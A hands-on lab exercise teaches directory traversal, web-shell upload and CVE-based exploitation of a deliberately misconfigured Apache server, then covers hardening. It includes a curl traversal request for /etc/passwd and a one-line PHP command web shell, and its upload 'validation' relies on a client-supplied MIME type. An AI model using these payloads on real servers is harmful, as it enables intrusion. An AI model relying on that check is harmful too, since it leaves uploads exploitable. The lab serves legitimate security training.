Exercise 16: Exploiting Misconfigured Apache Web Server

Objective: Learn how to exploit misconfigurations in an Apache web server to gain unauthorized access or escalate privileges, and understand how to secure the server against such attacks.

Scenario: The Apache web server is one of the most widely used web servers, but improper configurations can expose sensitive information or allow unauthorized actions. In this exercise, you will exploit common misconfigurations such as directory traversal, insecure file uploads, and exposed vulnerabilities to gain access. You will then secure the server to mitigate these issues.

Lab Setup

1. Environment:
   • An Apache web server with intentional misconfigurations.
   • Vulnerable configurations for directory traversal or file uploads.
2. Tools Required:
   • Web browser or curl for HTTP requests.
   • Custom scripts or web shells for exploitation.
   • Access to the server’s configuration files (optional).

Lab Steps

Step 1: Perform a Directory Traversal Attack

Attempt to access hidden files or directories in the web root using directory traversal techniques.

Example URL:

http://<target_ip>/../../etc/passwd

Replace <target_ip> with the IP address or domain of the Apache server.

Use curl to automate requests:

curl http://<target_ip>/../../etc/passwd

If successful, the server will return the contents of the /etc/passwd file.

Step 2: Identify Vulnerabilities in the Apache Configuration

Look for exposed sensitive directories:

Check for directories like /admin, /backup, or /uploads.

Example:

http://<target_ip>/backup

Analyze error messages for sensitive information:

Trigger errors by accessing non-existent files or invalid URLs.

Example:

curl http://<target_ip>/nonexistent

Look for information such as the server’s file structure, software versions, or debugging data.

Step 3: Exploit File Upload Vulnerabilities

Identify file upload functionality on the web application.

Example upload URL:

http://<target_ip>/upload

Upload a malicious web shell (e.g., php-reverse-shell.php):

Example malicious PHP code:

<?php system($_GET['cmd']); ?>

Execute the web shell to run arbitrary commands on the server:

Example URL:

http://<target_ip>/uploads/php-reverse-shell.php?cmd=id

Step 4: Exploit Known Apache Vulnerabilities

1. Research vulnerabilities in the specific Apache version:
   • Use CVE Details or Exploit-DB.
   • Example vulnerability: CVE-2021-41773 (path traversal and remote code execution in Apache 2.4.49).
2. Exploit the vulnerability using a script or manual HTTP requests.

Solution

Explanation:

• Directory traversal attacks exploit improper path validation, allowing access to files outside the web root.
• File upload vulnerabilities arise when uploaded files are not properly validated or restricted.
• Exploiting known Apache vulnerabilities leverages misconfigurations or outdated versions to gain unauthorized access.

Prevention:

Secure Directory Access:

Restrict access to sensitive directories using .htaccess or Apache configuration:

<Directory /var/www/html/private>
    Require all denied
</Directory>

Validate and Restrict File Uploads:

Restrict file types and enforce strict validation:

if ($_FILES['file']['type'] !== 'image/jpeg') {
    die('Invalid file type.');
}

Store uploads in a non-executable directory.

Harden Apache Configuration:

Disable directory listing:

Options -Indexes

Limit HTTP methods to only those required:

<LimitExcept GET POST>
    Require all denied
</LimitExcept>

Keep Apache Updated:

Regularly update Apache to the latest secure version:

sudo apt update && sudo apt upgrade

Enable ModSecurity:

Use ModSecurity to monitor and block malicious HTTP requests.

Testing and Verification

1. Re-attempt directory traversal and file upload attacks to ensure they are no longer effective.
2. Verify Apache version and modules to confirm they are secure.
3. Test application functionality to ensure legitimate features are unaffected by the mitigations.

Reflection

This exercise demonstrates the risks associated with misconfigured Apache web servers and provides practical steps to exploit and secure them. By completing this lab, you’ve gained insights into protecting web servers from common vulnerabilities and ensuring a robust security posture.